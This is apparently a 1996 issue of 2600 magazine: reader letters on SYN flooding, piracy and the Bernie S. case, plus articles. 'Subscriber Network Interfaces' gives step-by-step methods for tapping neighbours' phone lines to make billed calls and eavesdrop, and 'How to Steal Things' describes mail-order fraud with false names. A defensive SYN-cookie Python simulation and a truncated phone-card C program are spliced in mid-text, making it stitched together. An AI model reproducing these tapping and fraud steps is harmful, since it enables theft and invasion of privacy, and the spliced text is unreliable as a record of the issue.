IBM has created a magazine ad in which they state 
that they have a group of “ethical hackers” as part of 
their SecureWay family of products and services. These 
hackers will attempt to “break into your system and re- 
veal the cracks in your armor”. Once they know their 
customer’s vulnerabilities, they will “erect multilayered 
firewalls” and install “special” IBM software. While the 
ad speaks against “14-year-old sociopaths” and “wily 
hackers”, it would seem that they are supporting “ethi- 
cal hackers”. I am encouraged by IBM’s apparent posi- 
tion and I believe it is good for the H/P underground. 
This ad can be found in the October 1996 issue of Dis- 
cover magazine on pages 46 and 47. For a booklet on 
SecureWay, call 1-800-IBM-7080, ext. G204. 
Jack Stuart 
We hope IBM realizes that most of the “ethical 
hackers” out there don't work for IBM. 


A World of SYN 


Dear 2600: 

I have been reading 2600 casually for many years 
now, and in general I find it fascinating. However, I feel 
obligated to comment on the article describing SYN 
flooding in the Summer 96 issue. I’m fairly disap- 
pointed that the editors of 2600 would print such an un- 
enlightening and potentially abusable article, right 
down to the command line for the average peon cracker 
wannabe to type. While you may misinterpret this letter 
as a vain attempt on my part to have the editors of 2600 
censor articles, it’s not. Having articles that contain in- 
formation about well-known shortcomings in the 
TCP/IP protocol suite is not enlightening in the least to 
anyone who knows the protocols. Additionally, if 
knowledge really is power, and if you’re really trying to 
encourage your readers to understand these protocols 
instead of just typing your printed source code into their 
computers, you might suggest they read the TCP/IP Il- 
lustrated series. 

Providing source code removes any remaining ex- 
ploration and learning there might be. If someone can’t 
figure out how to use BSD sockets, perhaps they’re not 
ready to be reading 2600 yet. 

meem 

We understand the concern and even outrage that 
was voiced following the appearance of this article. 
However, we stand by this and future articles that point 
out major design flaws. You say this was a well known 
problem. Keeping quiet about it obviously did little to- 
wards getting it fixed. By letting everyone in on it now, 
we may cause some short term problems but nothing 
compared to what would happen if the flaws remain un- 
fixed while the net continues to grow. 


Dear 2600: 

While I am a staunch advocate of freedom to speak 
and freedom on the Internet, it is the antics of people 
like you that are going to screw it up for everyone. I am 
referring to your dissemination of the method to cause 
“denial of service” by flooding ISPs. This technique has 
no redeeming virtue and can only be used to disrupt and 
destroy. Ironically, the target of an attack by the method 
you distributed, Panix, is an ISP that has generously 
provided free resources to groups that advocate freedom 
for the Internet. Are you now happy with the results of 
your thoughtless abuse of freedom? The government is 
itching to control and censor the Internet and while free- 
dom on the Internet enjoys wide support, a few more in- 
cidents like the ones you made possible can sour public 
support and invite the crackdown we all dread. Do you 
really want to aid every nutcase with a keyboard and a 
lust for power to work their will on the Internet commu- 
nity? This is not computer science and lore; it is vandal- 
ism. Think about what you have done. If you disagree 
with me, I would be interested in your rationale. 

George 

The people at panix.com seem to understand why 
the article was published as well as the need to do some- 
thing about the problem. We agree it was most unfortu- 
nate that this of all systems was targeted but we feel the 
greater good was ultimately served by revealing the 
flaws. And we don't see this as a reason for more control 
and censorship; if anything, the quick and professional 
way this was dealt with on such systems shows us that 
we can take care of ourselves on the net without outside 
interference. 
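Both letters in this section, and the replies, turn on one mechanism: a SYN that is never followed by the client's ACK still costs the server a slot in its half-open connection queue, so a stream of SYNs from spoofed, unreachable sources fills the queue and real clients are turned away. The example below is added here and is not code from the Summer 96 article, from Panix, or from anyone quoted above. It is a Python simulation of that queue exhaustion next to the stateless fix, a SYN-cookie style listener that encodes the handshake in its own initial sequence number (an HMAC over the connection four-tuple, the client's ISN and a coarse timestamp) and stores nothing until the returning ACK proves the client really received the SYN-ACK. The backlog size, address ranges, timestamp ticks, validity window and 24-bit MAC truncation are constructed for the demo.

```python
import hashlib
import hmac
import os
from collections import OrderedDict


class StatefulListener:
    """Classic listener: each SYN takes a half-open queue slot until the
    handshake completes. Spoofed SYNs that never ACK fill the queue and
    later SYNs, legitimate ones included, are dropped."""

    def __init__(self, backlog=128):
        self.backlog = backlog
        self.half_open = OrderedDict()  # (src_ip, src_port) -> (client_isn, server_isn)
        self.dropped = 0

    def on_syn(self, src, client_isn):
        if len(self.half_open) >= self.backlog:
            self.dropped += 1
            return None  # queue full: SYN silently dropped
        server_isn = int.from_bytes(os.urandom(4), "big")
        self.half_open[src] = (client_isn, server_isn)
        return server_isn

    def on_ack(self, src, ack):
        entry = self.half_open.get(src)
        if entry and ack == (entry[1] + 1) & 0xFFFFFFFF:
            del self.half_open[src]  # handshake complete, slot freed
            return True
        return False


class CookieListener:
    """SYN-cookie style listener: the server ISN is an HMAC over the
    four-tuple, the client ISN and a coarse timestamp, so no state exists
    until the client's ACK echoes a valid, recent cookie."""

    def __init__(self, key=None, window=4):
        self.key = key or os.urandom(16)  # per-server secret (constructed)
        self.window = window  # how many timestamp ticks a cookie stays valid

    def _cookie(self, src, dst, client_isn, t):
        msg = f"{src}|{dst}|{client_isn}|{t}".encode()
        tag = hmac.new(self.key, msg, hashlib.sha256).digest()
        # high 8 bits carry the timestamp tick, low 24 bits a truncated MAC
        return ((t & 0xFF) << 24) | int.from_bytes(tag[:3], "big")

    def on_syn(self, src, dst, client_isn, t):
        return self._cookie(src, dst, client_isn, t)  # nothing is stored

    def on_ack(self, src, dst, client_isn, ack, t_now):
        seq = (ack - 1) & 0xFFFFFFFF
        for age in range(self.window):
            t = t_now - age
            if (t & 0xFF) == (seq >> 24) and self._cookie(src, dst, client_isn, t) == seq:
                return True  # valid recent cookie: allocate the connection now
        return False


def simulate_flood(n_flood=1000, backlog=128):
    """Constructed flood of spoofed SYNs followed by one legitimate client."""
    dst = ("198.51.100.1", 80)
    flood = [((f"10.0.{i // 256}.{i % 256}", 40000 + i), i) for i in range(n_flood)]
    legit, legit_isn = ("192.0.2.10", 51515), 7

    stateful = StatefulListener(backlog)
    for src, isn in flood:
        stateful.on_syn(src, isn)  # spoofed sources never ACK
    isn = stateful.on_syn(legit, legit_isn)
    stateful_ok = isn is not None and stateful.on_ack(legit, (isn + 1) & 0xFFFFFFFF)

    cookies = CookieListener()
    for src, isn in flood:
        cookies.on_syn(src, dst, isn, t=100)  # allocates nothing
    c = cookies.on_syn(legit, dst, legit_isn, t=100)
    cookie_ok = cookies.on_ack(legit, dst, legit_isn, (c + 1) & 0xFFFFFFFF, t_now=101)

    return {
        "stateful_accepts_legit": stateful_ok,
        "stateful_dropped": stateful.dropped,
        "cookie_accepts_legit": cookie_ok,
    }


if __name__ == "__main__":
    print(simulate_flood())
```

Two caveats a practitioner would add: a 24-bit MAC means an attacker who can guess cookies has roughly a one in sixteen million chance per blind ACK, which is why real implementations also rate-limit and only switch to cookies under load; and because the server keeps no state, TCP options from the client's SYN (window scaling, SACK) are lost unless they are squeezed into the cookie too. The queue-exhaustion half of the simulation is the part that is independent of any particular attack tool.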


Oops 


Dear 2600: 

From the response to a letter by s6killer, Volume 13, 
Number 2, page 31: “...All our issues are sent in en- 
velopes and the name of the magazine isn’t printed on 
the envelope...” 

The letters section of every issue of 2600 I can re- 
member has at least one letter from someone who’s 
afraid to subscribe for fear of parents/authorities finding 
out. Most of these letters are followed by a response 
from the editor similar to that above. 

So I’m a little concerned when my latest issue ar- 
rived in my PO Box in the normal yellow envelope, and 
the name and description of the magazine is printed 
clearly in the return address as follows: 

2600 Magazine 

“The Hacker Quarterly” 

PO Box 752 

Middle Island, NY 11953-0752 

Forwarding and Address Correction Requested 
Is there some miscommunication between your letters 
and subscription departments? If the return address has 
always appeared that way, I’ve never noticed it before, 
but I definitely notice it now. I personally couldn’t care 
less if people know I subscribe to 2600, but I know 
that’s not the case with all your other subscribers. 

Gordon 

Actually, you found an inconsistency with what 
we've been saying that has managed to escape us for 
years. While all current issues are sent in envelopes 
without the name of the magazine, back issues and t- 
shirts get a hand stamped return envelope that does 
have our name on it. (Sometimes new subscribers get 
their first issue in this manner as well.) This was defi- 
nitely an oversight on our part and we will immediately 
change the hand stamps so only the P.O. box is shown. 
But we should warn subscribers not to let their sub- 
scriptions lapse since the reminder letter we send out 
comes in an envelope with our name on it. This isn't a 
ploy to keep our most paranoid subscribers for the rest 
of their lives; it's just that we get those envelopes from 
the post office pre-stamped and that’s how they come. Of 
course, it could also be used as proof that you no longer 
subscribe.... 


More Flightlink Facts 


Dear 2600: 

The article “Flightlink Fun” (TDi) in the summer 
issue seems to not be very complete. First of all, the 
Flightlink system (In-Flight Phone Corp.) is not only in 
use by Continental Airlines, but also by US Air, Amer- 
ica West, and Carnival (the system is not widespread yet 
- a grand total of only 146 planes have been fitted). Be- 
sides the fact that I released much of this same informa- 
tion to alt.2600 early this year (circa January), this 
article lacks real data. It seems to gloss over the system, 
describing only the features. This is equivalent to writ- 
ing an article on “Hacking Pizza Hut” and describing 
only the edible items available to be bought. I would 
hope that your readers would want heartier info such as 
system hardware and OS specifications. I had begun re- 
searching the system, but stopped after deciding it 
wasn’t worth the effort. Nonetheless, I will provide the 
information that I did obtain. 


For starters, the telephone system is unintelligent, 
meaning that it does not check for the proper format, 
number of digits (or lack thereof), etc. before placing 
your call. Each plane has four or eight outdials (depend- 
ing on the plane), and air-to-ground frequencies 
shouldn’t be too difficult to find (849-851/894-895 
MHz). I traced some ANIs at different points in flight, 
and acquired these numbers (outdials on the ground - 
not accessible from the ground): (301) 654-9894, (310) 
961-2800, (318) 631-2725, (318) 631-6187, (501) 536- 
9602, (501) 536-9759, (502) 361-0346, (502) 361-3544, 
(615) 399-8622, (615) 399-8634, (708) 716-6600, (713) 
820-3250, (713) 820-3420, and (713) 820-3453. Scan- 
ning in these NPA/exchanges could prove useful. 

I wasn’t able to glean much OS/hardware info di- 
rectly from IFPC, but was able to get a few hardware 
specs on my own. Each set of three terminals (each row 
on each side of the aisle) connects to a concentrator un- 
der the seats. This concentrator (IF-DA 1109-102-03 
REV. H1) accepts one each of a ribbon cable (90301/26 
REV B 400-4) for the monitor and a twisted-pair cable 
(12-6568 REV.2 27478) for both a handset and an RJ11 
6-position DataLink connection for each of the three 
terminals (ports J10, J12, and J14). In addition, it uses 
what appears to be two LAN connections (one of which 
appears to be a three-conductor twisted cable) as well as 
a link to a power source. The following are 3M hood 
model numbers on the connectors (while this may seem 
like useless data, the type of connector could possibly 
be determined from this): monitor ribbon cable - 10326, 
handset twisted-pair cable - 10314, LAN cable #1 (port 
J3) - 10840, and LAN cable #2 (port J4) - 10336. While 
the concentrator does not seem to have any major pro- 
cessing capabilities, it does have a number of two-posi- 
tion switches, one of which is marked “TEST”. 
Checking the RJ11 DataLink port with a multimeter re- 
veals that it is indeed dead (01.4 mV DC) until valid 
plastic is inserted in the handset. 

In looking for the location of the IFPC, I found var- 
ious answers. Two possible locations I found are Oak- 
brook Terrace, IL (address unknown), and Charlotte, NC 
(5020 West Blvd., Charlotte, NC 28208-9775). Scanning 
the exchanges in these locations could prove profitable, 
and if you live nearby, you might want to go trashing. 

+universal cytixn+ 


Bernie S. Thoughts 


Dear 2600: 

I read the article on Ed Cummings with great inter- 
est (even went to your web site to get more information) 
and would like to put my two cents worth in. 

In your preface to the article (in the mag) you use a 
fairly strong tone to suggest that the whole incident is a 
fallacy of justice and should never have happened. I dis- 
agree with some of the rationale used in justifying your 
position on the situation. Reading your magazine and 
the information in it is not just for informational pur- 
poses. It is highly improbable that such innocence ex- 
ists. Instead it has to be assumed that someone will use 
the information for some purpose criminal or otherwise. 
This is true for Ed and his red boxes. I am not saying 
that Ed or anyone else is doing this for criminal reasons. 
But why develop these devices if there is no satisfaction 
in trying them? After all, would hacking be so much fun 
if you didn’t do it? 

I do think, though, that the added misperception of 
hackers, crackers, and the like as being malicious and 
criminal is far from true. I also believe that though there 
are people within our government and law enforcement 
who want Big Brother watching, that there are equally 
others who like yourselves are against those concepts 
and believe strongly in freedom. 

Freedom, though, is not without bounds. After all, 
freedom is merely a concept of our mind that has no tan- 
gible presence. It is the same theory behind currency. 
Our currency is no longer backed by some precious 
metal. Its strength lies solely in our belief that it has 
value. It is this concept that defines freedom. And 
though each person is allowed to interpret that freedom, 
we have to consider the whole and not the individual 
when trying to deal in Truth and Justice. 

I capitalize Truth and Justice because in philosophy 
there is talk of the absolute truth and justice by which all 
events can be viewed. This does not define good and 
bad, but allows for a method by which we can determine 
the rightness of an issue. 

This is where Ed was wronged. Law enforcement 
chose to view him with bias and therefore tilted the 
scales. This in turn brought about the problem. Lastly, I 
hope Ed realizes that driving on suspension is bad and 
should not do it. And that all your readers exercise dis- 
cretion and not forget that reality is very harsh and that 
true justice doesn’t exist. I send my deepest condolences 
to Ed and hope his situation is resolved and that he can 
lead a regular life. 
Kevin 
The very concept that someone can be imprisoned 
for possessing information or technology should be 
enough to demonstrate that there are severe problems 
with our justice system and ultimately with our so- 
called democratic society. Do you propose to judge the 
intent of everyone's words and possessions? Who will 
you trust to make this judgement? It's a very dangerous 
step that you seem willing to take. Everything from song 
lyrics to motion pictures to personal diaries to techno- 
logical toys can be seen as having only one evil purpose 
in the eyes of someone somewhere. You may think it’s 
easy to judge intent as if it were an action but, in reality, 
such judgements are extremely difficult and dangerous. 


Our Hypocrisy 


Dear 2600: 

I chanced upon a copy of your magazine when a 
colleague brought it into work. While I doubt I will ever 
feel the need to purchase a copy, I feel a few words are 
in order on a couple of topics: 

1) Copyright. The free distribution of software to 
people who are unwilling to pay for it is illegal and im- 
moral. Of course, I know of very few computer users 
who have not done this at one time or another. The fact 
that “everyone does it” does not make it any less illegal 
and immoral. I’m not writing to condemn anyone for 
doing this, but I abhor your vain attempts to rationalize 
this illegal and immoral act as somehow good for soci- 
ety or the industry. This is juvenile and irresponsible. If 
you are engaged in an illegal and immoral activity, that’s 
between you, God, and law enforcement. But be adult 
about it. Don’t try to rationalize that the law is wrong, 
that what you are doing is somehow good, or that you 
somehow have a right to do what you’re doing. Recog- 
nize that what you are doing is wrong, whether you in- 
tend to continue or not, and take responsibility for your 
actions when you are caught. Software developers 
spend valuable time writing software. That software ob- 
viously has value, or you wouldn’t want it. Software de- 
velopers would like to eat, and their means of getting 
food to eat is through the money that honest people are 
willing to spend for their product. To make the argument 
that the large developers make enough, and that your 
petty thievery won’t hurt is to violate the principles of 
free enterprise. This implies a socialist mentality moti- 
vated towards the redistribution of wealth - the antithe- 
sis of the foundation our constitution is based on - a 
constitution that you seem willing to invoke selectively 
through your advocacy of free speech and the rights of 
the accused. 

As a small-scale developer, every act of piracy 
against my software robs me of a significant part of po- 
tential profit. If this becomes too great, I will return to 
my day job and give up software development. Who will 
benefit from this? 

2) I support free speech and your right to print in- 
formation about how to write viruses. I think this is ex- 
tremely irresponsible, however. A virus is nothing more 
than a random act of vandalism. Why do you instruct 
people in how to construct such a thing? It serves no 
useful purpose and contributes to potentially millions of 
dollars worth of damage. It demonstrates a psycho- 
pathic disregard for the work and value of other people 
in society. I have a friend who was a writer. Literally 
thousands of hours of her work was once destroyed by a 
virus. Who knows how much money she may have 
made off the half-finished book? What was the point? 
People who develop viruses should simply be put up 
against the wall and shot out of hand, as unfit to cohabi- 
tate with other humans. 

I think if you run an article about how to construct a 
virus, you should run a counter article in the same issue 
about how to defeat that sort of virus. This sort of infor- 
mation point-counterpoint would be very useful and en- 
lightening. 

3) Your publication seems to take a cavalier attitude 
towards the concept of illegality when it suits you. No 
matter how you sugarcoat it, thievery is thievery. Bust- 
ing the code in an ATM is no less stealing from the bank 
as digging a tunnel under the vault or pointing a gun at a 
teller. 

4) You obviously have a cadre of very talented peo- 
ple. Too bad they can’t devote their efforts towards use- 
ful software that would enhance the ability of people to 
use their computers more efficiently. Why not forget 
about viruses and use your collective knowledge to 
write an operating system that beats the crap out of the 
Microsoft monopoly? Do something useful! 

Sean Emerson 
Goleta, CA 

You say you saw our magazine by examining a co- 
worker's copy. You should be made aware of the fact that 
not buying your own copy has resulted in your getting 
something from us without proper compensation. Or did 
you think that it was somehow different in your case, that 
it's fine and dandy to pass our words all over the hemi- 
sphere but every time someone makes a copy of your 
code, they had better be writing you a check? Obviously 
there are differences (those of you who didn't get the red 
box cover - we're being slightly sarcastic again), but 
you're oversimplifying what you see as a problem. No- 
body here supports software piracy of the sort where soft- 
ware is copied and sold for profit by someone else in 
much the same way as we don't support counterfeit CD's 
being sold to the public. But copying music, programs, 
and magazine articles leads to greater exposure for the 
artists, developers, and writers. If your product is not 
priced out of the reach of your intended audience, it will 
be in their interest to get an original copy. But in many 
cases this is not so and the only way people can even get 
a glimpse of what is being developed is by making 
copies. We don't think it’s fair to deny someone access 
based solely on economic disadvantage, just as most 
people wouldn't deny someone the right to read a book if 
they couldn't afford to actually buy a copy. Software liter- 
acy is an important achievement and should be encour- 
aged, not segregated. And if the law doesn't reflect this, 
we not only have a right but an obligation to challenge it. 

We're sorry to hear that your friend lost her entire 
book due to a computer virus. Whoever told her that 
leaving a single copy on a computer was a safe thing to 
do made a big mistake. Hard drives crash all the time. 
Files become corrupted, even accidentally erased. Com- 
puters are stolen. To prevent this type of thing, the very 
first step should be to keep backups and make printouts 
on a regular basis. Your friend should also be careful 
what kinds of software she introduces to her system as 
viruses can be contained on almost anything. You can 
blame us if it makes you feel better but it won't make the 
viruses go away. And every article we print on how to 
use a virus is also an article on how to be protected from 
one, if you take the time to learn. 

How you equate breaking a code to pointing a gun 
at someone is beyond us. Knowledge in itself is never a 
crime. The misuse of it is another matter entirely and 
one outside our responsibility. 

As for your suggestion that our readers do some- 
thing “useful”, it's quite unnecessary and rather insult- 
ing since a good number of them have been doing just 
that for some time. Our readers design the operating 
systems you use, the voice mail systems you call, the 
hardware you type on. And many of them never would 
have had the opportunity to even work in the field if they 
had to play by the rigid rules you seek to impose or be 
subject to your crippling moral code for their each and 
every action. We really hope you lighten up so you can 
someday see the potential you're trying to crush. 


Upgrade 


Dear 2600: 

Several people have written me about my article 
“Secret Codes” and the program it contained, 
CODEIT2.ZIP. Although the article says it is written in 
Power Basic 3.0, many people are trying to run it in 
QBASIC. This will not work. If anyone would like a 
more advanced version of the program and a compiled 
version, they can send e-mail to MRGALAXY@AOL.COM.
I will gladly e-mail them a copy of the
newest version. The program is also available on AOL. 

MRGALAXY 


(continued on page 49) 
It certainly was nice of AT&T to send us this check. But we sus-
pect that in their haste to seize our long distance trunks, they 
didn't bother to check whether or not we owned the line in the 
first place. As it happens, we don't. 516-751-9970 is a NYNEX 
test number. It's always busy. It's a busy signal test. And we 
doubt they're busy using any long distance company. 





We have no idea why AT&T has the notion that we own this 
number. We do know that every time a check like this is cashed, 
NYNEX winds up charging themselves $5 to switch long dis- 
tance carriers on a line they never use. It's the corporate way. 
(Our legal counsel says we can't tell you whether or not we 
cashed the check. Sorry.) 
SUBSCRIBER NETWORK INTERFACES


by Frequency Man (FreqMan) 


Also known as Telephone Network In- 
terfaces, Subscriber Network Interfaces are 
now installed on all new homes. These de- 
vices are installed so that the homeowner 
can check to see if a fault is in his wiring or 
in the telephone company lines. In actual- 
ity, it is the spot where the local telephone 
company’s lines are plugged into your 
house. When you open one up, you will en- 
counter two (or more) modular jacks, with 
matching modular plugs running into them. 
The modular plugs are the telephone com- 
pany’s lines, and they will be plugged into 
the jacks, which are your actual phone 
lines. For a homeowner to find a fault he 
must do this: First, get a phone that he is 
sure is working. Second, go down to his 
SNI and open it up. He then will unplug the 
modular plug from the line that has a fault 
in it, and plug his working phone into it. 
What he is doing is plugging the phone into 
the phone lines before they enter the house. 
As you have probably figured, if the fault is 
not present when using the phone from his 
SNI, then the fault is in the wiring in his 
house. If the fault is still present when us- 
ing the phone from his SNI, then it is a 
problem with the local phone company’s 
lines. 

Although SNI’s are a pretty good idea, 
and can be handy for locating phone trou- 
bles, most homeowners have no idea what 
the little green box on the side of their 
house is, or what it is for. Chances are that 
many homeowners are not even aware of its 
presence. 

The most common of these devices is 
the model CAC 3000, manufactured by 
Siecor. I know for a fact there are different 
models and brands, but I have yet to en- 
counter one which wasn’t a CAC 3000. 


Even if you are not working with this 
model, this information will still be valu- 
able for all types of SNI’s. 

SNI’s are usually small green boxes, 
perhaps 10 inches by 10 inches, and are 
usually found bolted to the side of the 
house, usually screwed shut. Sometimes 
they say Subscriber Network Interface on 
the front. They have a little loop which you 
can put a padlock on, but almost none of 
them do. Most of them have two sections 
you can open. There is the “Customer Ac- 
cess” section, which is most often opened 
with a flathead screwdriver, and there is the 
telco service access, behind an extra plastic 
shield. This is usually opened with an allen 
wrench and contains more complicated 
wiring and components. This article is writ-
ten to deal with the “Customer Access” sec-
tion, which is a lot of fun to play with by
itself. So don’t worry - even though this in- 
formation isn’t highly technical, you can 
still have plenty of fun from the “Customer 
Access” spot. 


Fun Thing #1 

Since you have a jack right there, there 
are many things you can do with your 
neighbors’ lines. When your neighbors go 
out of town, that is the best time to do some 
tinkering with their lines, so from here on I 
am going to assume that you are out of 
harm’s way while playing with their SNI. 

For a quick and easy phone call that you 
need to make, all you need to do is grab 
your phone, run over to your neighbor’s 
SNI, unplug the modular plug leading into 
Line 1, (they will be labelled) and plug in 
your phone. Dial away. This is all easier if 
you are not using a cordless phone, because 
with a cordless you also need a power out- 
let, of course. The reason for plugging into 
Line 1 and not Line 2 is because many peo-
ple still only have one line, and it will be
the one labeled Line 1 if this is the scenario.
Your calls will obviously be billed to who- 
ever’s SNI you are using, for those of you 
who don’t catch on too quick. 


Fun Thing #2 

This is actually a variation of “Fun 
Thing #1”. Instead of having to run over to 
your neighbor’s house every time you don’t 
want to pay for a call, I suggest just running 
some phone line straight from their SNI to 
your house. The best thing to do is dig a 
trench about 2 inches deep. Take some hol- 
low black tubing, the thin kind, and run the 
telephone wire through that. Now place 
your protected phone wire in the trench and 
cover it up. Plug one end into your neigh- 
bor’s SNI jack, and the other end straight 
into a phone at your house. Now you have
your neighbor’s phone line at your finger-
tips. Keep in mind that as long as your
phone is plugged into their SNI, they can’t
use that line. This is why I save this for
when they go on a two month vacation to
Myanmar.


Fun Thing #3 

Purchase a phone line fork, so you can 
plug two phones into one jack. Stick the 
fork into the modular jack for Line 1 of
your neighbor’s SNI. Now you have two 
modular jacks. In one of them, stick the line 
you have running to your house, like in 
“Fun Thing #2”, and in the other one, stick 
the matching modular plug for Line 1 of 
that house. This way, you can not only 
charge up their phone bill from your house, 
but you can also listen in on their phone 
conversations, and even add a little noise of 
your own if you wish. 


Fun Thing #4 

This is a little something you can build
up gradually, as time goes on. Buy some
sheet metal, and set up kind of a switch-
board for all your neighbors’ lines. Every
time one of your neighbors goes on vacation,
or moves, or whatever, hook that person’s
line from their SNI to your switchboard, the
way explained in “Fun Thing #3”. Eventu-
ally you will have quite an array of phone 
lines going into your house, and you can 
add in all sorts of gadgets to customize 
your switchboard to suit your needs. 

As clearly stated, SNI’s are a major tele- 
phone security flaw, and I love taking ad- 
vantage of it. It actually isn’t the telephone 
companies’ fault that this is so easy - it is 
the owner of the SNI. SNI’s are lockable, 
but never locked. Hideable, but never hid- 
den. Handy, but never used. These little 
green beauties are a lot of fun to play with 
in the summer, especially when all the folks 
in your neighborhood have taken off for 
their fun little summer vacation. This is def- 
initely the time to play with all these “Fun 
Things” I have told you about. Not like you 
wouldn’t have figured out what you could 
do with an SNI anyways, but at least these 
little tips help get your brain going. After 
all, if we didn’t use our brains, we would all 
end up like our neighbors. 
UNFRIENDLY 800 NUMBERS


by Secret Squirrel 

Despite some new consumer protections in 
the telecommunications law, some pay-per-call 
providers are still misleading the public into 
making “free” 800 calls that end up costing sig- 
nificant sums of money. 

Below is a list of some 800 numbers that ad-
vertise or charge for services. New numbers con-
tinue to pop up all the time. The owners of these
numbers technically follow the law, but the telcos
refuse to deal with the misrepresentations be-
cause they ultimately profit from all fraud.

This information was recently liberated from
internal MCI documents and was originally com-
piled by Joe Stevens of MCI Network Services
Systems Integrity.





215-2223 374-8487 568-3789 
234-7863 377-3655 568-6279 
234-8743 377-5683 572-0420 
238-5483 377-7883 589-5940 
252-0224 377-8653 626-6260 
260-6749 378-5425 643-0755 
274-7465 388-5347 643-7643 
274-7611 388-8462 666-3000 
275-3825 388-8636 666-3825 
275-4277 392-2661 666-4688 
275-4437 393-8895 667-6009 
275-4446 395-2661 669-7769 
275-4739 414-4475 677-5347 
275-4848 419-5425 677-6009 
283-1469 419-6969 677-6366 
283-1496 420-2661 678-2427 
283-3733 432-8906 678-5425 
283-3786 436-3660 678-8487 
283-4386 444-4323 684-5465 
283-7399 444-5425 685-2455 
285-0000 444-6749 688-2662 
285-4688 456-3825 688-6963 
285-5223 468-2223 692-2888 
285-5465 468-2868 695-3786 
285-6749 468-3283 695-5634 
286-1469 468-3825 697-7877 
289-6338 468-4475 699-3866 
289-7465 468-5239 701-4475 
300-3652 468-5878 723-5472 
326-3251 468-6454 733-5868 
326-3669 468-7399 733-5878 
328-3786 468-7588 733-7825 
328-4475 488-9453 733-7877 
328-4688 496-1661 733-8237 
333-5223 515-5425 733-8239 
333-6454 541-0007 736-7886 
335-6749 547-7165 745-0228 
342-5432 550-8286 745-1201 
365-6725 553-2223 746-1692 
365-9388 555-5472 752-5199 
369-3825 568-1661 752-5204 
374-4569 568-3337 753-3369 
374-4739 568-3786 753-7548 
753-8788 876-4681 945-2473
756-1600 876-5639 945-2661 
759-4323 876-5747 945-3166 
760-4688 876-7393 945-3382 
760-9453 876-7625 945-3736 
765-4878 876-7825 945-3786 
765-8788 877-0122 945-3825 
766-2469 877-3655 945-5347 
766-2789 877-5477 945-5465 
766-6749 879-7825 945-6662 
770-2442 879-9453 945-8487 
775-5839 883-5477 947-2661 
777-1152 887-0122 947-4323 
777-1249 888-5472 949-3669 
777-3666 892-5575 949-3699 
777-7825 916-6969 949-4688 
777-9388 920-2868 949-7399 
790-3825 922-3825 950-4739 
795-4323 925-7390 950-6749 
800-1723 926-2200 955-1717 
800-2976 929-2442 955-5165 
800-6278 929-4878 955-5465 
807-7595 929-8788 955-5477 
822-4475 933-2738 955-9447 
825-4629 933-3825 959-2625 
825-4688 933-8258 959-5465 
833-2523 933-9913 964-4475 
843-2223 934-3255 964-5472 
846-2868 937-2888 967-4323 
846-3648 938-2661 967-6725 
846-6749 938-2697 967-6749 
846-7393 938-2866 995-9938 
847-3301 938-2868 999-1061 
856-3992 938-3425 999-2223 
866-8339 938-3768 999-2625 
869-6662 938-3873 999-3825 
869-9664 938-4875 999-4553 
869-9681 938-7399 999-5477 
871-4739 938-8487 999-5683 
872-3825 938-8928 999-6666 
872-4739 944-5347 999-6749 
873-4642 944-6969 999-7825 
876-4639 945-2424 999-8255 
HOW TO STEAL THINGS


by Ted Perver 


Everybody loves free stuff, especially 
expensive free stuff, especially when it’s re- 
ally not worth the high prices being asked 
for it. The answer? Mail order magic! 

It just so happens that I have a friend 
whose name sounds suspiciously like mine 
who has learned how to be a mail order ma- 
gician! This champion of consumer rights 
has already received hundreds of dollars in 
free merchandise using his magical mail or- 
der powers. I certainly hope that anyone 
reading this article doesn’t actually do any 
of the things described in it because, con- 
sumer rights or not, they may be illegal. 

My friend tells me that obtaining easy 
free merchandise in the mail is as simple as 
following these directions. 

He says that, first of all, this approach 
will not work for large items such as exer- 
cise equipment, computers, or anything 
else that would have to be signed for. This 
method is most effective for obtaining free 
CD’s, free books, possibly even free soft- 
ware and magazine subscriptions. Also, 
stick only to the giant companies like Time 
Life, Columbia House, and Rolling Stone 
Magazine. 

The first step is responding to the adver- 
tisement. If it is a television or radio ad, call 
the number and order the product to your 
address. Give a false name. It won’t matter; 
it’ll still arrive. Then, when asked how you 
will pay, ask them to bill you. If they don’t 
offer billing, abort the mission and hang up. 
If they do, then you’re all set. 

If you are subscribing to a magazine by 
filling out one of those subscription cards, 
just fill in your correct address with a false 
name and drop it in the mail. 

Eventually your new free merchandise
will arrive with a bill. Open and begin to
enjoy your new free merchandise and throw
the bill in the trash.

In about two weeks a second bill will ar- 
rive. Either directly on the bill or on a note 
enclosed with the bill, notify the company 
that no one by the name of so and so lives at 
your address and that no one in your house- 
hold has ordered or received any merchan- 
dise from their company. This works the 
same way with magazines. 

After two or three more weeks you will 
receive a postcard from the company in the 
mail which says something to the effect of 
“Sorry for the inconvenience - have a nice 
life!” 

Voila! That’s all there is to it. You’ve ei- 
ther got free music or a few free issues of 
your favorite overpriced magazine. 

This strategy is especially effective when 
used to purchase groups of merchandise 
such as 10 free CDs or five free books from 
a book club. It’s not hard to imagine the pos- 
sibilities this simple strategy offers. 

Personally, I think this simple mail order 
magic is not only beneficial for the pur- 
poses already described, but also as a view 
of how things work in the mail world, and 
perhaps even as a starting point for other 
mail order magic. 

Now a word or two of advice. My friend 
says that people should probably be careful 
about overdoing it as repeated encounters 
would probably get noticed eventually, even 
in a huge corporation. Also, he urges people 
not to indiscriminately order anything they 
see, but to target blatantly overpriced mer- 
chandise. He firmly believes that his mail 
order magic is a tool of consumer rights 
supporters who want to fight back against 
oppressive big businesses and the unjust 
and unfair pricing of certain merchandise. 
(continued from page 19)





Notes on Chart 

The chart (shown below) applies only to 
Holland, but is also related to Germany, 
Greece, and England, among other places. 

Order of serial output reads left to right. 
Only the VALUE and WORM bits can be set to 
zero. 

If a value bit of 8 units or more is written, 
the erase function will set all eight bits of the 
next lower value to 1's. 


PC turns over after 512 CLK pulses and se- 
quence repeats. 

Chip powers up at bit 0 which is always 1. 

Only the first 104 bits appear to be used. 
($00-$0C) 

Different types of chips may have different 
memory structures. All types can be identified 
by the first 64 bits of unalterable memory. 
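
The rules above can be checked against a small model. The program below is an added example, written for this edit and not taken from the article or from the chart it refers to. It simulates a card whose serial stream follows the notes: bit 0 always 1, 64 unalterable ID bits, value bits that can only be cleared, and the erase function that refills the next lower value with eight 1s whenever a bit worth 8 units or more is written. The exact bit map is an assumption made for the example (four 8-bit value stages at bits 64-95, worth 1, 8, 64 and 512 units per bit, then eight WORM bits at 96-103, for 104 bits in all); the chart gives the real layout, so the offsets would need adjusting before running this against a captured stream.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* ASSUMED layout, for illustration only (the article's chart, which gives
   the real bit map, is not reproduced here): serial output is read left to
   right from bit 0; bits 0-63 are unalterable ID (bit 0 always 1); bits
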